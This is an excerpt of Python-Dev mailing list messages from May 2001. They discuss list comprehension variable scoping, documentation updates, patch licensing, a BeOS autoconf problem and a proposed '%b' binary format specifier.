CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker at metaslash.com From fdrake at cj42289-a.reston1.va.home.com Wed May 30 07:31:01 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 01:31:01 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update for development version of Python (2.2). Mostly small updates, but I've worked on new markup for grammar productions used in the Reference Manual. Currently, only the lexical productions in Chapter 2 of the manual have been converted to the new markup and layout. Please take a look and send comments to doc-sig at python.org; the first page containing these changes is at: http://python.sourceforge.net/devel-docs/ref/identifiers.html The changes needed to implement the markup have not been checked in yet, and there are some bugs in the implementation (both for HTML and PDF), but this should make the productions easier to navigate. I've tested the HTML version on Linux only with Mozilla 0.9, Opera 5.0b8, and Netscape Navigator 4.77. Navigator is definately lagging behind in CSS support! Also added Michel Pelletier's documentation for the HTMLParser module, with some small changes. From tim.one at home.com Wed May 30 07:51:04 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 01:51:04 -0400 Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: [Fred Drake] > The development version of the documentation has been updated: > > http://python.sourceforge.net/devel-docs/ > > Incremental update for development version of Python (2.2). > > Mostly small updates, but I've worked on new markup for grammar > productions used in the Reference Manual. Currently, only the lexical > productions in Chapter 2 of the manual have been converted to the new > markup and layout. Please take a look and send comments to > doc-sig at python.org; the first page containing these changes is at: > > http://python.sourceforge.net/devel-docs/ref/identifiers.html > > The changes needed to implement the markup have not been checked in > yet, and there are some bugs in the implementation (both for HTML and > PDF), but this should make the productions easier to navigate. Let me suggest starting with http://python.sourceforge.net/devel-docs/ref/integers.html instead, and clicking on "digit" in the "hexdigit" production. The problem with the originally suggested page is that all the links point into the same paragraph, so "nothing happens" when you click one. But "digit" was the cause of a bogus bug report, as the submitter didn't realize "digit" had been defined earlier in the docs, and without something like these mondo cool new links it's almost impossible to find cross-section production definitions. Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the node24.html page it refers to doesn't seem to exist. From fdrake at acm.org Wed May 30 07:53:23 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 01:53:23 -0400 (EDT) Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com> Tim Peters writes: > Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the > node24.html page it refers to doesn't seem to exist. That was the bug alluded to. The digit* grouped with the nonzerodigit also doesn't work, although the other two uses of digit on that page (floating.html) work properly. I'll investigate tomorrow; just too tired tonight. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From tim.one at home.com Wed May 30 09:47:47 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 03:47:47 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: [David Beazley] > ... > However, I've also been shooting myself in the foot a little more > than usual > ... > Because of this, I have frequently found myself debugging the > following programming error: If "frequently" is "a little more than usual", then it sounds like your problems in all areas are too common for us to really help you by fixing this one . OK, I'm afraid the behavior follows from taking seriously the idea that listcomps are syntactic sugar for a specific pattern of nested loops and "if" tests. That was done to make it explainable, and the correspondence is indeed exact. The implementation already creates "invisible" names: >>> [repr(name) for name in globals().keys()] ["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"] >>> Where did "_[1]" come from? You guessed it. Look for it after the listcomp finishes and it's gone: >> globals().keys() '__builtins__', '__name__', 'name', '__doc__'] >> It's invisible because it's a temp var you *wouldn't* see in the equivalent loop nest. > ... > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner I'm not sure it's worth losing the exact correspondence with nested loops; or that it's not worth it either. Note that "the iterator variables" needn't be bare names: >>> class x: ... pass ... >>> [1 for x.i in range(3)] [1, 1, 1] >>> x.i 2 >>> This complicates explaining exactly how you want to deviate from the for-loop model. So, I think, does this: >>> [i for i in range(2) for i in range(2, 5)] [2, 3, 4, 2, 3, 4] >>> That is, even in simple cases, is the desired scope attached to the "for" or to the "[]"? Python doesn't have a problem with reusing a name as a for target in nested loops (or in listcomps today). > ... > Just as an aside, I have never intentionally used the iterator > variable of a list comprehension after the operation has completed. Not even in a debugger, when the operation has completed via unexpected exception, and you're desperate to know what the control vrbl was bound to at the time of death? Or in an exception handler? >>> import sys >>> try: ... [i*i for i in xrange(sys.maxint)] ... except OverflowError: ... raise OverflowError("oops! blew up at %d" % i) ... Traceback (most recent call last): File "", line 4, in ? OverflowError: oops! blew up at 46341 >>> Or what about: i = 12 def f(): print i return [i for i in range(i)] f() 1. Should "print i" print 12, or raise UnboundLocalError? 2. Does the "i" in "range(i)" refer to the global i, or is that just senseless? So long as the for-loop model is followed faithfully, nothing is hard to explain or predict, and simply because there's nothing truly new. > I was actually quite surprised with this behavior the first time I saw > it. Me too . > I suspect most other programmers would not anticipate this side > effect either. I share the suspicion, but am not sure why: "for" is a binding construct in Python, so being surprised by "for" binding a name is itself surprising. Another principled model is possible, where [f(i) for i in whatever] is treated like (lambda: [f(i) for i in whatever])() >>> i = 12 >>> (lambda: [i**2 for i in range(4)])() [0, 1, 4, 9] >>> i 12 >>> That's more like Haskell does it. But the day we explain a Python construct in terms of a lambda transformation is the day Guido kills all of us . From esr at thyrsus.com Wed May 30 10:00:56 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 04:00:56 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010530040056.A27662@thyrsus.com> Tim Peters : > That's more like Haskell does it. But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . They'll get *my* lambdas when they pry them from my cold, dead fingers , but I find I don't have a strong opinion about how the scoping should work. -- Eric S. Raymond "Experience should teach us to be most on our guard to protect liberty when the government's purposes are beneficient... The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well meaning but without understanding." -- Supreme Court Justice Louis Brandeis From thomas at xs4all.net Wed May 30 13:14:24 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 30 May 2001 13:14:24 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700 References: Message-ID: <20010530131424.Y690@xs4all.nl> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote: > OK, I'm un-withdrawing this patch. Just had to get things > straight with our lawyer. The patch is released under the > following license (the X11 license with 4 extra paragraphs > of disclaimers :): > http://www.zoteca.com/opensource/LICENSE.txt This raises an interesting point. Do we want separate pieces of the Python distribution to have separate licences ? I'd point out that the zoteca licence isn't mentioned on the OSI site as an Approved Licence, and that the licence contains a copyright notice, but no clear statement whether it's allowed to copy the licence other than together with the piece of software it's distributed with. The easiest solution would of course be for Itamar to get his boss/lawyers to give us the right to relicence it under the PSF licence :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From jack at oratrix.nl Wed May 30 14:26:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 30 May 2001 14:26:39 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: Message by Thomas Wouters , Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl> Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl> > On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote: > > > OK, I'm un-withdrawing this patch. Just had to get things > > straight with our lawyer. The patch is released under the > > following license (the X11 license with 4 extra paragraphs > > of disclaimers :): > > http://www.zoteca.com/opensource/LICENSE.txt > > [...] > > The easiest solution would of course be for Itamar to get his boss/lawyers > to give us the right to relicence it under the PSF licence :) I think this is the only viable solution. If various parts of Python have different license agreements this may well be a reason for people not to use Python because the hassle of figuring out which pieces fit their own licensing policy. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From beazley at cs.uchicago.edu Wed May 30 15:49:29 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Wed, 30 May 2001 08:49:29 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Tim Peters writes: > > Because of this, I have frequently found myself debugging the > > following programming error: > > If "frequently" is "a little more than usual", then it sounds like your > problems in all areas are too common for us to really help you by fixing > this one . I've probably been bitten by this about 5-10 times over the last few months. I can also say that it's a real bugger to track down when it happens. Now while this may just be a user problem on my part (which I can accept), I think there is a much deeper semantic problem with the current implementation of list comprehensions. Specifically, we now have this really cool list construction technique that is, for all practical purposes, an operator. Yet, at the same time, this "operator" has a really nasty side-effect of changing the values of variables in the surrounding scope in a very unnatural and unexpected way. More generally, it's essentially the same behavior that you would get if you wrote some code like this: a = expr(x,y) and expr() went off and nuked the value of x, replacing it with something completely different (note: I'm not talking about cases where x might be mutable here). Since you can write things like this a = [ 2*x for x in s] it's easy to view the right hand side as being isolated in the same way as a normal expression (where the name of the iteration variable "x" is incidental--a throwaway if you will). Maybe everyone else views list comprehensions as a series of statements (the syntactic sugar for nested for-loop idea). However, if you look at how they can be used, it's completely different than this. Specifically, if I write something like this: a = [2*x for x in s] + [3*x for x in t] I certainly don't conceptualize it as being literally expanded into the following sequence of statements: t1 = [ ] for x in s: t1.append(2*x) t2 = [ ] for x in t: t2.append(3*x) a = t1 + t2 > > I'm not sure it's worth losing the exact correspondence with nested loops; > or that it's not worth it either. Note that "the iterator variables" > needn't be bare names: > > >>> class x: > ... pass > ... > >>> [1 for x.i in range(3)] > [1, 1, 1] > >>> x.i > 2 > >>> > Hmmm. I didn't realize that you could even do this. Yes, this would definitely present a problem. However, if list comprehensions were modified not to assign any names in the current scope, it still seems like this would work (in this case, "x" is already defined and "x.i" is not creating a new name, but is setting an attribute on something else). Couldn't nested scopes be used to implement this in some manner? > > ... > > Just as an aside, I have never intentionally used the iterator > > variable of a list comprehension after the operation has completed. > > Not even in a debugger, when the operation has completed via unexpected > exception, and you're desperate to know what the control vrbl was bound to > at the time of death? Or in an exception handler? > Nope. I don't make programming mistakes---well, other than this one, and well, all of those other ones :-). > Another principled model is possible, where > > [f(i) for i in whatever] > > is treated like > > (lambda: [f(i) for i in whatever])() > > >>> i = 12 > >>> (lambda: [i**2 for i in range(4)])() > [0, 1, 4, 9] > >>> i > 12 > >>> > > That's more like Haskell does it. But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . Ah yes, well this is exactly the kind of behavior that seems most natural to me. It's also the behavior that everyone expected went I went around to the various Python hackers in the department and asked them about it yesterday. I suppose I could just write this: a = (lambda s: [2*i for i in s])(s) However, that's pretty ugly. In any case, I'm mostly just curious if anyone else has been bitten by the problem I've described. I would certainly love to see a fix for it (I would even volunteer to work on a prototype implementation if there is interest). On the other hand, if no changes are deemed necessary, we should at least try to better emphasize this behavior in the documentation--perhaps encouraging people to use private names. For example: a = [_i*2 for _i in t] (although, I have to say that this just looks like a gross hack--I'd rather not have to resort to doing this). Cheers, Dave From fdrake at acm.org Wed May 30 16:03:13 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 10:03:13 -0400 (EDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> David Beazley writes: > Maybe everyone else views list comprehensions as a series of > statements (the syntactic sugar for nested for-loop idea). However, I certainly don't. I know that that was used as part of the design consideration, but it's not at all clear to me that this is desirable. If I see code like this: x = 42 L = [x**2 for x in range(2000)] print x I think it should map to something like this from C++: int x = 42; int L[2000]; for (int x = 0; x < 2000; ++x) { L[x] = x * x; } printf("%d\n", x); i.e., both *should* print "42\n" on standard output. Tim sez: > I'm not sure it's worth losing the exact correspondence with nested loops; > or that it's not worth it either. Note that "the iterator variables" > needn't be bare names: > > >>> class x: > ... pass > ... > >>> [1 for x.i in range(3)] > [1, 1, 1] > >>> x.i > 2 David: > Hmmm. I didn't realize that you could even do this. Yes, this would > definitely present a problem. However, if list comprehensions were I didn't realize this either. I'm quite surprised by it, in fact, though I understand (I think) why it works that way. But was this intentional? It seems like pure evil to me! I'd only expect it to support bare names and sequence unpacking (with only bare names at the "edge" of all nested unpackings). -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From gward at python.net Wed May 30 16:36:30 2001 From: gward at python.net (Greg Ward) Date: Wed, 30 May 2001 10:36:30 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <20010530103630.B11580@gerg.ca> On 30 May 2001, David Beazley said: > In any case, I'm mostly just curious if anyone else has been bitten by > the problem I've described. For the record, I have not been bitten by this, but I probably don't use list comps as much as you do. I can completely sympathize with both your and Tim's point of view here. Both make perfect sense at the same time. Hmmm. "Do I contradict myself? Very well then I contradict myself, (I am large, I contain multitudes)" Greg -- Greg Ward - Unix nerd gward at python.net http://starship.python.net/~gward/ Money is a powerful aphrodisiac. But flowers work almost as well. From barry at digicool.com Wed May 30 17:07:12 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 11:07:12 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading References: <20010530131424.Y690@xs4all.nl> <20010530122702.F3FE53B8999@snelboot.oratrix.nl> Message-ID: <15125.3232.925401.563151@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> The easiest solution would of course be for Itamar to get his TW> boss/lawyers to give us the right to relicence it under the TW> PSF licence :) >>>>> "JJ" == Jack Jansen writes: JJ> I think this is the only viable solution. If various parts of JJ> Python have different license agreements this may well be a JJ> reason for people not to use Python because the hassle of JJ> figuring out which pieces fit their own licensing policy. I completely agree. IMO, the most important job of the PSF is to make the Python IP sane again. That means clearing as much of the existing rights as possible, and releasing it under the NAIPL (New And Improved Python License). Any code that is licensed differently could mean that it'll be ripped out of some re-distributions. I'd be less concerned about some ancillary module that few people use, and much more concerned about some core piece of the code. -Barry From mal at lemburg.com Wed May 30 21:57:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 21:57:17 +0200 Subject: [Python-Dev] Autoconf problems on BeOS Message-ID: <3B15509D.C790D5DF@lemburg.com> I have a bug report assigned to myself which really is more about autoconf than Unicode. The problem is that the SIZEOF_xxx tests cause the Metroworks compiler on BeOS to fail and this again causes these defines to be set to 0 ! Could someone with more autoconf experience please have a look ? https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470 Thanks, -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Wed May 30 22:07:37 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 16:07:37 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> Message-ID: [Tim] > Note that "the iterator variables" needn't be bare names: [Fred] > I didn't realize this either. You have to get your head out of the docs and read more code . > I'm quite surprised by it, in fact, though I understand (I think) why > it works that way. But was this intentional? I expect so. > It seems like pure evil to me! Sometimes it's the bee's knees; for example, >>> digits = range(3) >>> x = [None] * 3 >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits] >>> base3 [[0, 0, 0], [0, 0, 1], [0, 0, 2], [0, 1, 0], [0, 1, 1], [0, 1, 2], [0, 2, 0], [0, 2, 1], [0, 2, 2], [1, 0, 0], [1, 0, 1], [1, 0, 2], [1, 1, 0], [1, 1, 1], [1, 1, 2], [1, 2, 0], [1, 2, 1], [1, 2, 2], [2, 0, 0], [2, 0, 1], [2, 0, 2], [2, 1, 0], [2, 1, 1], [2, 1, 2], [2, 2, 0], [2, 2, 1], [2, 2, 2]] >>> I've done stuff "like that" often, albeit via the nested-loop spelling. > I'd only expect it to support bare names and sequence unpacking (with > only bare names at the "edge" of all nested unpackings). It's too late to take it away now! Python always worked this way. And it's really got nothing to do with what implementing what David wants (e.g., the lambda transformation I mentioned preserves its semantics) -- apart from (I hope) driving home that changes need to be considered very carefully. From tim.one at home.com Wed May 30 22:22:19 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 16:22:19 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: [David Beazley, pretty much repeats why he doesn't like the current scheme] I hoped it was clear the first time I was at least half sympathetic! If it wasn't, I am . >> >>> i = 12 >> >>> (lambda: [i**2 for i in range(4)])() >> [0, 1, 4, 9] >> >>> i >> 12 >> >>> >> >> That's more like Haskell does it. > Ah yes, well this is exactly the kind of behavior that seems most > natural to me. It's also the behavior that everyone expected went I > went around to the various Python hackers in the department and asked > them about it yesterday. I believe that. > I suppose I could just write this: > > a = (lambda s: [2*i for i in s])(s) > > However, that's pretty ugly. It's too complicated, isn't it? In the presence of nested scopes (which are reality in 2.2), a = (lambda: [2*i for i in s])() does the same thing and is conceptually clearer. I'm not suggesting that you actually write that, but view it as a *model* for your intended semantics. I wouldn't want to see the implementation actually use a lambda under the covers, either, but we need some crisp way to explain the intent. Note that the lambda-trick *model* "does the right thing" for for-loop targets like x.i and x[i] too. > In any case, I'm mostly just curious if anyone else has been bitten by > the problem I've described. I would certainly love to see a fix for > it (I would even volunteer to work on a prototype implementation if > there is interest). I encourage that, but since it's not 100% backward-compatible you'll enjoy the usual range of hysterical opposition. Needs a PEP, and possibly even an associated future-statement. Overall, I'm more in favor of changing it than not. From skip at pobox.com Wed May 30 22:48:47 2001 From: skip at pobox.com (Skip Montanaro) Date: Wed, 30 May 2001 15:48:47 -0500 Subject: [Python-Dev] scoping and list comprehensions Message-ID: <15125.23727.168431.762320@beluga.mojam.com> Regarding the issue of how list comprehensions should relate to their environment, perhaps instead of modifying list comprehensions to make them execute in new local scopes (or at least appear to) a better solution would be to allow a new local scope to be introduced inline, sort of like in C: { int i; for (i=0; i < 10; i++) { dostuffwith(i); } } While this might be used more for list comprehensions than other constructs, I'm sure people will find a way to (ab)use it for other things as well. I don't see an obvious way of adding such functionality to Python without introducing a new keyword though, which is going to make it difficult to get past Guido: l = [] scope: l = [i**2 for i in range(10)] print l Hmmm, wait a minute, what if you terminated a block introducer (if or while clause or try/except clauses) with something other than a colon? (I'm just thinking out loud, I don't think this is necessarily a good solution). if 1: # no new scope introduced l = [i**2 for i in range(10)] print l vs. if 1; # new scope introduced for enclosed block l = [i**2 for i in range(10)] print l That certainly has some line noise qualities about it, especially since colons and semicolons are visually so similar, but does offer an alternative to introducing a new keyword into the language. Hmmm, wait another minute, perhaps you could simply overload def: l = [] def: l = [i**2 for i in range(10)] print l There's also the problem of how to export results from the scope, though perhaps the new nested scope stuff provides a solution to that. (I've ignored them so far, so I can't tell...) Would it be possible for the compiler to recognize the degenerate def: and simply mangle any names that would clash instead of introducing an actual new execution frame? The above might be equivalent to l = [] l = [__mangled_i**2 for __mangled_i in range(10)] print l if 'i' already existed in the same scope. Just thinking out loud. I'm not sure any of these ideas is any better than the current state of affairs. Skip From Greg.Wilson at baltimore.com Wed May 30 23:11:16 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 30 May 2001 17:11:16 -0400 Subject: [Python-Dev] %b format? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> I would like to add a "%b" format for converting numbers to binary format (1's and 0's). I realize this isn't a C-ism, but it would be very useful for teaching purposes, as newcomers find 101101 a lot easier to understand than 0x2D. Reactions? Greg ----------------------------------------------------------------------------------------------------------------- The information contained in this message is confidential and is intended for the addressee(s) only. If you have received this message in error or there are any problems please notify the originator immediately. The unauthorized use, disclosure, copying or alteration of this message is strictly forbidden. Baltimore Technologies plc will not be liable for direct, special, indirect or consequential damages arising from alteration of the contents of this message by a third party or as a result of any virus being passed on. In addition, certain Marketing collateral may be added from time to time to promote Baltimore Technologies products, services, Global e-Security or appearance at trade shows and conferences. This footnote confirms that this email message has been swept by Baltimore MIMEsweeper for Content Security threats, including computer viruses. From esr at thyrsus.com Wed May 30 23:28:38 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:28:38 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <20010530172838.A778@thyrsus.com> Greg Wilson : > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). I realize > this isn't a C-ism, but it would be very useful for > teaching purposes, as newcomers find 101101 a lot > easier to understand than 0x2D. > > Reactions? +1. Didactically pretty useful, and the additional code won't boost global complexity much. -- Eric S. Raymond Where rights secured by the Constitution are involved, there can be no rule making or legislation which would abrogate them. -- Miranda vs. Arizona, 384 US 436 p. 491 From tim.one at home.com Wed May 30 23:30:49 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 17:30:49 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: <20010530131424.Y690@xs4all.nl> Message-ID: [Thomas Wouters] > This raises an interesting point. Do we want separate pieces of the > Python distribution to have separate licences ? This is a question for the PSF to resolve, since the PSF is intended to become the sole legal owner of Python's IP rights. My position will be that nothing ships in the distribution unless copyright has been assigned to the PSF, or the contributor has agreed to give the PSF a non-exclusive irrevocable etc license to release their work under the PSF license du jour. Fleshing out the second option so as to prevent abuse on either side is going to require significant effort ("what if the PSF goes away?", "what if the PSF changes its license to something I hate?", "what if I change my mind?", etc). Unfortunately, significant effort takes significant time too, and nobody has started on this yet. From mal at lemburg.com Wed May 30 23:31:06 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 23:31:06 +0200 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> Message-ID: <3B15669A.43B70A44@lemburg.com> "Eric S. Raymond" wrote: > > Greg Wilson : > > I would like to add a "%b" format for converting > > numbers to binary format (1's and 0's). I realize > > this isn't a C-ism, but it would be very useful for > > teaching purposes, as newcomers find 101101 a lot > > easier to understand than 0x2D. > > > > Reactions? > > +1. Didactically pretty useful, and the additional code won't boost > global complexity much. Good idea. The only question I have is: in which order will you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I am thinking of adding a bit field type to mxNumber and have the same problem there... -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Wed May 30 23:42:22 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:42:22 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400 References: <20010530131424.Y690@xs4all.nl> Message-ID: <20010530174222.A1019@thyrsus.com> Tim Peters : > My position will be that nothing ships in the distribution unless copyright > has been assigned to the PSF, or the contributor has agreed to give the PSF > a non-exclusive irrevocable etc license to release their work under the PSF > license du jour. Fleshing out the second option so as to prevent abuse on > either side is going to require significant effort ("what if the PSF goes > away?", "what if the PSF changes its license to something I hate?", "what if > I change my mind?", etc). > > Unfortunately, significant effort takes significant time too, and nobody has > started on this yet. I think a PSF pleadge to use only an OSI-certified license would address some of these issues. Write it into the bylaws if necessary. -- Eric S. Raymond He that would make his own liberty secure must guard even his enemy from oppression: for if he violates this duty, he establishes a precedent that will reach unto himself. -- Thomas Paine From esr at thyrsus.com Wed May 30 23:44:57 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:44:57 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530174457.B1019@thyrsus.com> M.-A. Lemburg : > > > I would like to add a "%b" format for converting > > > numbers to binary format (1's and 0's). I realize > > > this isn't a C-ism, but it would be very useful for > > > teaching purposes, as newcomers find 101101 a lot > > > easier to understand than 0x2D. > > > > +1. Didactically pretty useful, and the additional code won't boost > > global complexity much. > > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? > > I am thinking of adding a bit field type to mxNumber and have > the same problem there... For *this* context, we clearly want mathematical notation; MSB to the right and no byte-swapping. After all we'd actually be printing numerals, not dumping a bitfield. -- Eric S. Raymond The people of the various provinces are strictly forbidden to have in their possession any swords, short swords, bows, spears, firearms, or other types of arms. The possession of unnecessary implements makes difficult the collection of taxes and dues and tends to foment uprisings. -- Toyotomi Hideyoshi, dictator of Japan, August 1588 From barry at digicool.com Wed May 30 23:49:22 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 17:49:22 -0400 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <15125.27362.431144.886216@anthem.wooz.org> >>>>> "GW" == Greg Wilson writes: GW> I would like to add a "%b" format for converting numbers to GW> binary format (1's and 0's). For completeness, wouldn't you also want a binary integer literal so your students could write binary numbers in their code? And what about a binary() operator a la hex()? -Barry From tim.one at home.com Wed May 30 23:50:31 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 17:50:31 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com> Message-ID: [Greg Wilson] > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to %o is to __oct__ as nothing is to %b is to nothing. In that respect it's unfortunate that Python has distinct nb_oct and nb_hex slots in the PyNumberMethods struct (as opposed to a single parameterized "convert to base N string" method). [MAL] > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I'm sure Greg has in mind only integers, in which case %x and %o already give the only useful answer. From fdrake at cj42289-a.reston1.va.home.com Wed May 30 23:51:22 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 17:51:22 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Update for development version of Python (2.2). This update substantially re-works the prototype support for productions of a formal grammar. They look better, support forward references to symbol definitions, and allow download of an all-text version of the complete grammar (with productions ordered the same way as they are in the documentation sources). "Documeting Python" now includes documentation for the LaTeX markup used to describe productions: http://python.sourceforge.net/devel-docs/doc/grammar-displays.html From esr at thyrsus.com Thu May 31 00:05:09 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:05:09 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400 References: <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530180509.B1305@thyrsus.com> Tim Peters : > -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to > %o is to __oct__ as nothing is to %b is to nothing. In that respect it's > unfortunate that Python has distinct nb_oct and nb_hex slots in the > PyNumberMethods struct (as opposed to a single parameterized "convert to > base N string" method). Is the right answer to add the convert-to-base slot and deprecate the other two? -- Eric S. Raymond If gun laws in fact worked, the 